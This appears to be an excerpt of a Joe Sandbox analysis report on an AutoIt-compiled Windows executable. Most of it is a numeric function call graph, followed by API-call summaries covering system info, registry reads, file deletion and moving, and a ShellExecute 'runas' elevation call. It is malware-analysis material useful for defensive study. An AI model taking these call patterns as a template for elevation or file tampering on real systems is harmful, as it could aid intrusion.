64822 bb2ad0 143 API calls 64820->64822 64820->64833 64821->64817 64823 babe6d 9 API calls 64821->64823 64835 bb0326 messages 64822->64835 64823->64817 64824 bb1645 64828 babe6d 9 API calls 64824->64828 64824->64833 64825 bc016b 9 API calls 64825->64835 64826 babe6d 9 API calls 64826->64835 64827 bf5c7f 64830 babe6d 9 API calls 64827->64830 64827->64833 64828->64833 64829 bb1940 143 API calls 64829->64835 64830->64833 64831 bc05d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 64831->64835 64832 bc0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 64832->64835 64834 bc0433 22 API calls pre_c_initialization 64834->64835 64835->64824 64835->64825 64835->64826 64835->64827 64835->64829 64835->64831 64835->64832 64835->64833 64835->64834 64836 bb15af 64837 bbe34f 11 API calls 64836->64837 64838 bb15c5 64837->64838 64841 bbe3b3 64838->64841 64840 bb15ef 64842 ba7a14 11 API calls 64841->64842 64843 bbe3ea 64842->64843 64844 bab25f 11 API calls 64843->64844 64845 bbe41b 64843->64845 64846 bfe4e4 64844->64846 64845->64840 64847 ba7af4 11 API calls 64846->64847 64848 bfe4ef 64847->64848 64853 bbe73b 31 API calls 64848->64853 64850 bfe502 64851 bab3fe 9 API calls 64850->64851 64852 bfe506 64850->64852 64851->64852 64852->64852 64853->64850 64854 be27a2 64857 ba2a52 64854->64857 64858 be39f4 DestroyWindow 64857->64858 64859 ba2a91 mciSendStringW 64857->64859 64867 be3a00 64858->64867 64860 ba2aad 64859->64860 64864 ba2d08 64859->64864 64863 ba2abb 64860->64863 64860->64867 64861 ba2d17 UnregisterHotKey 64861->64864 64862 be3a1e FindClose 64862->64867 64865 be3a45 64863->64865 64868 ba2ad0 64863->64868 64864->64860 64864->64861 64869 be3a69 64865->64869 64870 be3a58 FreeLibrary 64865->64870 64866 ba7953 FindCloseChangeNotification 64866->64867 64867->64862 64867->64865 64867->64866 64868->64869 64875 ba2ade 64868->64875 64871 be3a7d VirtualFree 64869->64871 64873 ba2b4b 64869->64873 
64870->64865 64871->64869 64872 ba2b3a OleUninitialize 64872->64873 64874 ba2b66 64873->64874 64877 be3ac5 messages 64873->64877 64881 ba2f86 VirtualFreeEx CloseHandle 64874->64881 64875->64872 64878 ba2b7c 64878->64877 64882 ba2eb8 CloseHandle 64878->64882 64880 ba2d03 64881->64878 64882->64880 64883 bdd1e0 GetEnvironmentStringsW 64884 bdd1f4 64883->64884 64885 bdd1f0 64883->64885 64890 bd3bb0 64884->64890 64887 bdd208 __fread_nolock 64895 bd2d58 64887->64895 64889 bdd222 FreeEnvironmentStringsW 64889->64885 64891 bd3bec 64890->64891 64893 bd3bbe pre_c_initialization 64890->64893 64891->64887 64892 bd3bd9 RtlAllocateHeap 64892->64891 64892->64893 64893->64891 64893->64892 64900 bc523d 7 API calls 2 library calls 64893->64900 64896 bd2d8c 64895->64896 64897 bd2d63 RtlFreeHeap 64895->64897 64896->64889 64897->64896 64898 bd2d78 64897->64898 64899 bd2d7e GetLastError 64898->64899 64899->64896 64900->64893 64901 bad4a4 64902 bad4d6 64901->64902 64903 bc016b 9 API calls 64902->64903 64904 bad539 64903->64904 64918 bac2cd 64904->64918 64907 bc016b 9 API calls 64908 bad61e messages 64907->64908 64910 babe6d 9 API calls 64908->64910 64911 bab3fe 9 API calls 64908->64911 64913 bf1f1c 64908->64913 64915 bac34b 9 API calls 64908->64915 64916 bad8c1 messages 64908->64916 64909 bac34b 9 API calls 64914 bad95c messages 64909->64914 64910->64908 64911->64908 64917 bad973 64914->64917 64924 bbe284 9 API calls messages 64914->64924 64915->64908 64916->64909 64916->64914 64923 bac2dd 64918->64923 64919 bac2e5 64919->64907 64920 bc016b 9 API calls 64920->64923 64921 babe6d 9 API calls 64921->64923 64922 bac2cd 11 API calls 64922->64923 64923->64919 64923->64920 64923->64921 64923->64922 64924->64914 64925 ba105b 64930 ba522e 64925->64930 64927 ba106a 64955 bc0433 22 API calls __onexit 64927->64955 64929 ba1074 64931 ba523e 64930->64931 64956 ba51bf 64931->64956 64934 ba65a4 11 API calls 64935 ba5316 64934->64935 64962 ba684e 64935->64962 64937 ba5325 64938 babceb 11 API calls 
64937->64938 64939 ba5337 RegOpenKeyExW 64938->64939 64940 be4bc0 RegQueryValueExW 64939->64940 64945 ba5359 64939->64945 64941 be4bdd 64940->64941 64942 be4c56 RegCloseKey 64940->64942 64943 bc019b 9 API calls 64941->64943 64942->64945 64954 be4c68 _wcslen 64942->64954 64944 be4bf6 64943->64944 64946 ba41a6 9 API calls 64944->64946 64945->64927 64947 be4c01 RegQueryValueExW 64946->64947 64948 be4c1e 64947->64948 64951 be4c38 messages 64947->64951 64949 ba84b7 11 API calls 64948->64949 64949->64951 64950 ba627c 11 API calls 64950->64954 64951->64942 64952 bab25f 11 API calls 64952->64954 64953 ba684e 11 API calls 64953->64954 64954->64945 64954->64950 64954->64952 64954->64953 64955->64929 64957 be22f0 64956->64957 64958 ba51cc GetFullPathNameW 64957->64958 64959 ba51ee 64958->64959 64960 ba84b7 11 API calls 64959->64960 64961 ba520c 64960->64961 64961->64934 64963 ba685d 64962->64963 64967 ba687e __fread_nolock 64962->64967 64965 bc019b 9 API calls 64963->64965 64964 bc016b 9 API calls 64966 ba6891 64964->64966 64965->64967 64966->64937 64967->64964 64968 ba1098 64973 ba5d78 64968->64973 64972 ba10a7 64974 babf07 64973->64974 64975 ba5d8f GetVersionExW 64974->64975 64976 ba84b7 11 API calls 64975->64976 64986 ba5ddc 64976->64986 64977 ba5ecc GetCurrentProcess IsWow64Process 64978 ba5ee8 64977->64978 64979 ba5f00 LoadLibraryA 64978->64979 64980 be50f2 GetSystemInfo 64978->64980 64981 ba5f4d GetSystemInfo 64979->64981 64982 ba5f11 GetProcAddress 64979->64982 64983 ba5f27 64981->64983 64982->64981 64985 ba5f21 GetNativeSystemInfo 64982->64985 64987 ba5f2b FreeLibrary 64983->64987 64988 ba109d 64983->64988 64984 be50ad 64985->64983 64986->64977 64986->64984 64987->64988 64989 bc0433 22 API calls __onexit 64988->64989 64989->64972 64990 bfe6dd 64991 bfe68a 64990->64991 64993 c0e753 SHGetFolderPathW 64991->64993 64994 ba84b7 11 API calls 64993->64994 64995 c0e780 64994->64995 64995->64991 64996 bab7d2 64997 bab7dc 64996->64997 65000 babb3d 64997->65000 65001 babbc7 
65000->65001 65007 babb4d __fread_nolock 65000->65007 65003 bc019b 9 API calls 65001->65003 65002 bc016b 9 API calls 65004 babb54 65002->65004 65003->65007 65005 bc016b 9 API calls 65004->65005 65006 bab7e8 65004->65006 65005->65006 65007->65002 65008 bab810 65015 ba91c7 65008->65015 65010 bab84b 65012 babb3d 11 API calls 65010->65012 65011 bab821 65011->65010 65013 babb3d 11 API calls 65011->65013 65014 bab60e 65012->65014 65013->65010 65016 babceb 11 API calls 65015->65016 65018 ba91d6 65016->65018 65017 ba9224 65017->65011 65018->65017 65019 baacc0 11 API calls 65018->65019 65019->65018 65020 bc0456 65042 bc047d InitializeCriticalSectionAndSpinCount GetModuleHandleW 65020->65042 65022 bc045b 65053 bc027a 65022->65053 65024 bc0462 65025 bc0475 65024->65025 65026 bc0467 65024->65026 65059 bc0bcf IsProcessorFeaturePresent 65025->65059 65063 bc0433 22 API calls __onexit 65026->65063 65029 bc0471 65030 bc047c InitializeCriticalSectionAndSpinCount GetModuleHandleW 65032 bc04d8 GetProcAddress GetProcAddress GetProcAddress 65030->65032 65033 bc04c3 GetModuleHandleW 65030->65033 65035 bc053e CreateEventW 65032->65035 65036 bc0506 65032->65036 65033->65032 65034 bc0564 65033->65034 65037 bc0bcf ___scrt_fastfail 4 API calls 65034->65037 65035->65034 65041 bc050e __crt_fast_encode_pointer 65035->65041 65036->65035 65036->65041 65038 bc056b DeleteCriticalSection 65037->65038 65039 bc0587 65038->65039 65040 bc0580 CloseHandle 65038->65040 65040->65039 65043 bc04d8 GetProcAddress GetProcAddress GetProcAddress 65042->65043 65044 bc04c3 GetModuleHandleW 65042->65044 65046 bc053e CreateEventW 65043->65046 65047 bc0506 65043->65047 65044->65043 65045 bc0564 65044->65045 65048 bc0bcf ___scrt_fastfail 4 API calls 65045->65048 65046->65045 65052 bc050e __crt_fast_encode_pointer 65046->65052 65047->65046 65047->65052 65049 bc056b DeleteCriticalSection 65048->65049 65050 bc0587 65049->65050 65051 bc0580 CloseHandle 65049->65051 65050->65022 65051->65050 65052->65022 65054 bc028d 
65053->65054 65055 bc0289 65053->65055 65056 bc0bcf ___scrt_fastfail 4 API calls 65054->65056 65058 bc029a pre_c_initialization ___scrt_release_startup_lock 65054->65058 65055->65024 65057 bc031e 65056->65057 65058->65024 65060 bc0be4 ___scrt_fastfail 65059->65060 65061 bc0c8f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 65060->65061 65062 bc0cda ___scrt_fastfail 65061->65062 65062->65030 65063->65029 65064 bf6553 65065 bc016b 9 API calls 65064->65065 65066 bf655a 65065->65066 65070 c0fa10 65066->65070 65068 bf6566 65069 c0fa10 9 API calls 65068->65069 65069->65068 65071 c0fa30 65070->65071 65072 c0faf9 65071->65072 65073 bc019b 9 API calls 65071->65073 65072->65068 65074 c0fa6c 65073->65074 65074->65072 65075 babe6d 9 API calls 65074->65075 65075->65074 65076 bd8792 65081 bd854e 65076->65081 65080 bd87ba 65085 bd857f 65081->65085 65082 bd86c8 65084 bd86d3 65082->65084 65100 bd2b7c 19 API calls __wsopen_s 65082->65100 65084->65080 65091 be0d24 65084->65091 65085->65082 65094 bc919b 65085->65094 65088 bc919b 31 API calls 65089 bd873b 65088->65089 65089->65082 65090 bc919b 31 API calls 65089->65090 65090->65082 65103 be0421 65091->65103 65093 be0d3f 65093->65080 65095 bc923b 65094->65095 65097 bc91af 65094->65097 65102 bc9253 31 API calls __wsopen_s 65095->65102 65099 bc91d1 65097->65099 65101 bd2b7c 19 API calls __wsopen_s 65097->65101 65099->65082 65099->65088 65100->65084 65101->65099 65102->65099 65104 be042d ___scrt_is_nonwritable_in_current_image 65103->65104 65105 be043b 65104->65105 65106 be0474 65104->65106 65134 bd2b7c 19 API calls __wsopen_s 65105->65134 65110 be09fb 65106->65110 65109 be044a __wsopen_s 65109->65093 65135 be07cf 65110->65135 65112 be0a18 65113 be0a2d 65112->65113 65147 be073a CreateFileW 65112->65147 65113->65109 65115 be0aa4 65116 be0b21 GetFileType 65115->65116 65118 be0af6 GetLastError __dosmaperr 65115->65118 65148 be073a CreateFileW 65115->65148 65117 be0b2c GetLastError __dosmaperr CloseHandle 65116->65117 
65120 be0b73 65116->65120 65117->65113 65132 be0b63 65117->65132 65118->65113 65122 be0be0 65120->65122 65149 be094b 34 API calls 2 library calls 65120->65149 65121 be0ae9 65121->65116 65121->65118 65127 be0c0d 65122->65127 65150 be04ed 34 API calls 2 library calls 65122->65150 65125 be0c06 65126 be0c1e 65125->65126 65125->65127 65126->65113 65129 be0c9c CloseHandle 65126->65129 65151 bd8a3e 65127->65151 65158 be073a CreateFileW 65129->65158 65131 be0cc7 65131->65132 65133 be0cd1 GetLastError __dosmaperr 65131->65133 65132->65113 65133->65132 65134->65109 65136 be080a 65135->65136 65138 be07f0 65135->65138 65159 be075f 65136->65159 65138->65136 65164 bd2b7c 19 API calls __wsopen_s 65138->65164 65140 be0842 65141 be0871 65140->65141 65165 bd2b7c 19 API calls __wsopen_s 65140->65165 65142 be093e 65141->65142 65145 be08c4 65141->65145 65166 bd2b8c 11 API calls _abort 65142->65166 65145->65112 65146 be094a 65147->65115 65148->65121 65149->65122 65150->65125 65152 bd8a4e 65151->65152 65153 bd8a54 65152->65153 65154 bd8a92 FindCloseChangeNotification 65152->65154 65155 bd8ac8 __dosmaperr 65153->65155 65157 bd8ad4 65153->65157 65154->65153 65156 bd8a9e GetLastError 65154->65156 65155->65157 65156->65153 65157->65113 65158->65131 65161 be0777 65159->65161 65160 be0792 65160->65140 65161->65160 65167 bd2b7c 19 API calls __wsopen_s 65161->65167 65163 be07c1 65163->65140 65164->65136 65165->65141 65166->65146 65167->65163 65168 bcf08e 65169 bcf09a ___scrt_is_nonwritable_in_current_image 65168->65169 65170 bcf0bb 65169->65170 65171 bcf0a6 65169->65171 65175 bcf0fb 65170->65175 65178 bd2b7c 19 API calls __wsopen_s 65171->65178 65174 bcf0b6 __wsopen_s 65179 bcf126 65175->65179 65177 bcf108 65177->65174 65178->65174 65180 bcf134 65179->65180 65181 bcf14e 65179->65181 65190 bd2b7c 19 API calls __wsopen_s 65180->65190 65187 bd9799 65181->65187 65184 bcf144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65184->65177 65192 bd9616 65187->65192 65189 bcf173 65189->65184 65191 bcf2bb 22 
API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65189->65191 65190->65184 65191->65184 65193 bd9622 ___scrt_is_nonwritable_in_current_image 65192->65193 65194 bd96f6 65193->65194 65195 bd967a 65193->65195 65198 bd962a __wsopen_s 65193->65198 65204 bd2b7c 19 API calls __wsopen_s 65194->65204 65195->65198 65199 bd971b 65195->65199 65198->65189 65200 bd972d 65199->65200 65201 bd9735 65200->65201 65202 bd9746 SetFilePointerEx 65200->65202 65201->65198 65202->65201 65203 bd975e GetLastError __dosmaperr 65202->65203 65203->65201 65204->65198 65205 baf48c 65208 baca50 65205->65208 65207 baf49a 65209 baca6b 65208->65209 65210 bf14af 65209->65210 65211 bf1461 65209->65211 65218 baca90 65209->65218 65240 c261ff 143 API calls 2 library calls 65210->65240 65214 bf146b 65211->65214 65216 bf1478 65211->65216 65211->65218 65238 c26690 143 API calls 65214->65238 65229 bacd60 65216->65229 65239 c26b2d 143 API calls 2 library calls 65216->65239 65220 bbe781 31 API calls 65218->65220 65223 bf168b 65218->65223 65227 bab3fe 9 API calls 65218->65227 65228 bacf30 31 API calls 65218->65228 65218->65229 65230 bb02f0 143 API calls 65218->65230 65231 babe6d 9 API calls 65218->65231 65232 bbe73b 31 API calls 65218->65232 65233 bbaa19 143 API calls 65218->65233 65234 bc05d2 5 API calls __Init_thread_wait 65218->65234 65235 bc0433 22 API calls __onexit 65218->65235 65236 bc0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 65218->65236 65237 bbf354 143 API calls 65218->65237 65220->65218 65241 c26569 11 API calls 65223->65241 65227->65218 65228->65218 65229->65207 65230->65218 65231->65218 65232->65218 65233->65218 65234->65218 65235->65218 65236->65218 65237->65218 65238->65216 65239->65229 65240->65218 65241->65229 65242 bc078b 65243 bc0797 ___scrt_is_nonwritable_in_current_image 65242->65243 65272 bc0241 65243->65272 65245 bc079e 65246 bc08f1 65245->65246 65249 bc07c8 65245->65249 65247 bc0bcf ___scrt_fastfail 4 API calls 65246->65247 65248 bc08f8 65247->65248 65303 
bc51e2 65248->65303 65259 bc0807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65249->65259 65280 bd280d 65249->65280 65256 bc07e7 65263 bc0868 65259->65263 65306 bc51aa 31 API calls 4 library calls 65259->65306 65260 bc086e 65292 ba32a2 65260->65292 65288 bc0ce9 65263->65288 65266 bc088a 65266->65248 65267 bc088e 65266->65267 65268 bc0897 65267->65268 65308 bc5185 17 API calls _abort 65267->65308 65309 bc03d0 ___vcrt_uninitialize_ptd ___vcrt_uninitialize_locks ___vcrt_uninitialize_winapi_thunks ___scrt_uninitialize_crt ___vcrt_uninitialize 65268->65309 65271 bc089f 65271->65256 65273 bc024a 65272->65273 65311 bc0a28 IsProcessorFeaturePresent 65273->65311 65275 bc0256 65312 bc3024 ___vcrt_initialize_winapi_thunks ___vcrt_initialize_locks ___vcrt_uninitialize_locks 65275->65312 65277 bc025b 65278 bc025f 65277->65278 65313 bc304d ___vcrt_uninitialize_ptd ___vcrt_uninitialize_locks ___vcrt_uninitialize_winapi_thunks 65277->65313 65278->65245 65281 bd2824 65280->65281 65314 bc0e1c 65281->65314 65283 bc07e1 65283->65256 65284 bd27b1 65283->65284 65285 bd27e0 65284->65285 65286 bc0e1c _ValidateLocalCookies 5 API calls 65285->65286 65287 bd2809 65286->65287 65287->65259 65322 bc26d0 65288->65322 65291 bc0d0f 65291->65260 65293 ba32ae IsThemeActive 65292->65293 65294 ba3309 65292->65294 65324 bc52d3 65293->65324 65307 bc0d22 GetModuleHandleW 65294->65307 65296 ba32d9 65297 bc5339 19 API calls 65296->65297 65298 ba32e0 65297->65298 65330 ba326d SystemParametersInfoW SystemParametersInfoW 65298->65330 65300 ba32e7 65331 ba3312 65300->65331 65302 ba32ef SystemParametersInfoW 65302->65294 65884 bc4f5f 65303->65884 65306->65263 65307->65266 65308->65268 65309->65271 65311->65275 65312->65277 65313->65278 65315 bc0e25 65314->65315 65316 bc0e27 IsProcessorFeaturePresent 65314->65316 65315->65283 65318 bc0fee 65316->65318 65321 bc0fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65318->65321 65320 bc10d1 
65320->65283 65321->65320 65323 bc0cfc GetStartupInfoW 65322->65323 65323->65291 65325 bc52df ___scrt_is_nonwritable_in_current_image 65324->65325 65371 bd32ee EnterCriticalSection 65325->65371 65327 bc52ea pre_c_initialization 65372 bc532a 65327->65372 65329 bc531f __wsopen_s 65329->65296 65330->65300 65332 ba3322 65331->65332 65333 ba332e GetCurrentDirectoryW 65332->65333 65334 ba4f60 65333->65334 65335 ba3355 IsDebuggerPresent 65334->65335 65336 be3c7d MessageBoxA 65335->65336 65337 ba3363 65335->65337 65338 be3c95 65336->65338 65337->65338 65339 ba3377 65337->65339 65410 ba40e0 65338->65410 65376 ba3a1c 65339->65376 65343 ba3396 GetFullPathNameW 65344 ba84b7 11 API calls 65343->65344 65345 ba33d5 65344->65345 65390 ba41e6 65345->65390 65346 ba33e9 65348 be3cc6 SetCurrentDirectoryW 65346->65348 65349 ba33f1 65346->65349 65348->65349 65350 ba33fc 65349->65350 65354 be3cf3 65349->65354 65406 ba345a 7 API calls 65350->65406 65355 bab25f 11 API calls 65354->65355 65356 be3d0a 65355->65356 65358 be3d39 65356->65358 65359 be3d12 65356->65359 65357 ba3406 65362 ba343d SetCurrentDirectoryW 65357->65362 65361 ba65a4 11 API calls 65358->65361 65360 ba65a4 11 API calls 65359->65360 65363 be3d1d 65360->65363 65364 be3d35 GetForegroundWindow ShellExecuteW 65361->65364 65365 ba3451 65362->65365 65366 ba7af4 11 API calls 65363->65366 65368 be3d6a 65364->65368 65365->65302 65369 be3d2b 65366->65369 65368->65357 65370 ba65a4 11 API calls 65369->65370 65370->65364 65371->65327 65375 bd3336 LeaveCriticalSection 65372->65375 65374 bc5331 65374->65329 65375->65374 65377 ba3a29 65376->65377 65378 ba3a42 65377->65378 65379 be40b4 ___scrt_fastfail 65377->65379 65418 ba39de 65378->65418 65380 be40d0 GetOpenFileNameW 65379->65380 65382 be411f 65380->65382 65383 ba84b7 11 API calls 65382->65383 65385 be4134 65383->65385 65385->65385 65387 ba3a60 65433 ba6085 65387->65433 65391 ba41f3 65390->65391 65849 ba5937 65391->65849 65393 ba41f8 65394 ba4272 65393->65394 65860 ba489e 9 API calls 
65393->65860 65394->65346 65396 ba4205 65396->65394 65861 ba4558 12 API calls 65396->65861 65398 ba420e 65398->65394 65399 ba4212 GetFullPathNameW 65398->65399 65400 ba84b7 11 API calls 65399->65400 65883 ba35ab 7 API calls 65406->65883 65408 ba3401 65409 ba353a CreateWindowExW CreateWindowExW ShowWindow ShowWindow 65408->65409 65409->65357 65411 ba40ee 65410->65411 65412 ba4145 65410->65412 65414 ba40ff 65411->65414 65415 bc016b 9 API calls 65411->65415 65413 bc016b 9 API calls 65412->65413 65413->65414 65416 ba4154 9 API calls 65414->65416 65415->65414 65417 ba4116 65416->65417 65417->65346 65419 be22f0 65418->65419 65420 ba39eb GetLongPathNameW 65419->65420 65421 ba84b7 11 API calls 65420->65421 65422 ba3a13 65421->65422 65423 ba5379 65422->65423 65424 ba538b 65423->65424 65425 be4d35 65424->65425 65426 ba53a1 65424->65426 65428 bbe2e5 26 API calls 65425->65428 65431 be4d57 65425->65431 65427 ba684e 11 API calls 65426->65427 65429 ba53ad 65427->65429 65428->65425 65457 ba1340 65429->65457 65432 ba53c0 65432->65387 65463 ba636d 65433->65463 65436 be51bf 65440 be51d4 65436->65440 65441 be51f1 65436->65441 65437 ba636d 50 API calls 65438 ba60be 65437->65438 65438->65436 65439 ba60c6 65438->65439 65444 be51dc 65439->65444 65445 ba60d2 65439->65445 65563 ba63db 65440->65563 65443 bc019b 9 API calls 65441->65443 65456 be5236 65443->65456 65569 c0e223 37 API calls 65444->65569 65485 ba3aa3 65445->65485 65448 be51ea 65448->65441 65449 ba338e 65449->65343 65449->65346 65450 ba63db 23 API calls 65453 be53e7 65450->65453 65451 babb3d 11 API calls 65451->65456 65453->65450 65576 c0a12a 39 API calls 65453->65576 65455 bab25f 11 API calls 65455->65456 65456->65451 65456->65453 65456->65455 65570 ba5ad3 65456->65570 65458 ba1352 65457->65458 65462 ba1371 __fread_nolock 65457->65462 65461 bc019b 9 API calls 65458->65461 65459 bc016b 9 API calls 65460 ba1388 65459->65460 65460->65432 65461->65462 65462->65459 65577 ba6332 LoadLibraryA 65463->65577 65468 ba6398 LoadLibraryExW 

                Control-flow Graph

                APIs
                • GetVersionExW.KERNEL32(?), ref: 00BA5DA7
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                • GetCurrentProcess.KERNEL32(?,00C3DC2C,00000000,?,?), ref: 00BA5ED3
                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00BA5EDA
                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00BA5F05
                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BA5F17
                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00BA5F25
                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00BA5F2C
                • GetSystemInfo.KERNEL32(?,?,?), ref: 00BA5F51
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                • API String ID: 3290436268-3101561225
                • Opcode ID: 93465fddc8ee2b5d2f92fe2c7d520bc021edce43e23c60f89af2eb15322aecdb
                • Instruction ID: ef91c881169f9455f0effa0eab3cf327f87cd0e1597b712d557a32e7a243adfe
                • Opcode Fuzzy Hash: 93465fddc8ee2b5d2f92fe2c7d520bc021edce43e23c60f89af2eb15322aecdb
                • Instruction Fuzzy Hash: 61A1603595E7C0CFC725CB697C817AD7FE8AB26700B0458D9E48D97272D3284AC8CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00BA32EF,?), ref: 00BA3342
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00BA32EF,?), ref: 00BA3355
                • GetFullPathNameW.KERNEL32(00007FFF,?,?,00C72418,00C72400,?,?,?,?,?,?,00BA32EF,?), ref: 00BA33C1
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                  • Part of subcall function 00BA41E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BA33E9,00C72418,?,?,?,?,?,?,?,00BA32EF,?), ref: 00BA4227
                • SetCurrentDirectoryW.KERNEL32(?,00000001,00C72418,?,?,?,?,?,?,?,00BA32EF,?), ref: 00BA3442
                • MessageBoxA.USER32 ref: 00BE3C8A
                • SetCurrentDirectoryW.KERNEL32(?,00C72418,?,?,?,?,?,?,?,00BA32EF,?), ref: 00BE3CCB
                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C631F4,00C72418,?,?,?,?,?,?,?,00BA32EF), ref: 00BE3D54
                • ShellExecuteW.SHELL32(00000000,?,?), ref: 00BE3D5B
                  • Part of subcall function 00BA345A: GetSysColorBrush.USER32(0000000F), ref: 00BA3465
                  • Part of subcall function 00BA345A: LoadCursorW.USER32(00000000,00007F00), ref: 00BA3474
                  • Part of subcall function 00BA345A: LoadIconW.USER32 ref: 00BA348A
                  • Part of subcall function 00BA345A: LoadIconW.USER32 ref: 00BA349C
                  • Part of subcall function 00BA345A: LoadIconW.USER32 ref: 00BA34AE
                  • Part of subcall function 00BA345A: LoadImageW.USER32 ref: 00BA34C6
                  • Part of subcall function 00BA345A: RegisterClassExW.USER32 ref: 00BA3517
                  • Part of subcall function 00BA353A: CreateWindowExW.USER32 ref: 00BA3568
                  • Part of subcall function 00BA353A: CreateWindowExW.USER32 ref: 00BA3589
                  • Part of subcall function 00BA353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00BA32EF,?), ref: 00BA359D
                  • Part of subcall function 00BA353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00BA32EF,?), ref: 00BA35A6
                  • Part of subcall function 00BA38F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BA39C3
                Strings
                • AutoIt, xrefs: 00BE3C7F
                • runas, xrefs: 00BE3D4F
                • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00BE3C84
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                • API String ID: 683915450-2030392706
                • Opcode ID: aeb49c9b63139028e10f415c40e8f0e5c6e0c3db72254cc49cbfd3af36ad93f4
                • Instruction ID: a1f5b99d2bd6e84694bd906aeb7d713377f90781da1defc61914ec892b24a0d2
                • Opcode Fuzzy Hash: aeb49c9b63139028e10f415c40e8f0e5c6e0c3db72254cc49cbfd3af36ad93f4
                • Instruction Fuzzy Hash: 2651277010C381AECB21EF60EC45F6E7BE8DF96B04F0444ADF486531A2CF248A89D762
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                  • Part of subcall function 00BA557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA5558,?,?,00BE4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BA559E
                  • Part of subcall function 00C0E9C5: GetFileAttributesW.KERNELBASE(?,00C0D755), ref: 00C0E9C6
                • FindFirstFileW.KERNELBASE(?,?), ref: 00C0D8E2
                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C0D99D
                • MoveFileW.KERNEL32(?,?), ref: 00C0D9B0
                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C0D9CD
                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C0D9F7
                  • Part of subcall function 00C0DA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00C0D9DC,?,?), ref: 00C0DA72
                • FindClose.KERNEL32(00000000,?,?,?), ref: 00C0DA13
                • FindClose.KERNEL32(00000000), ref: 00C0DA24
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
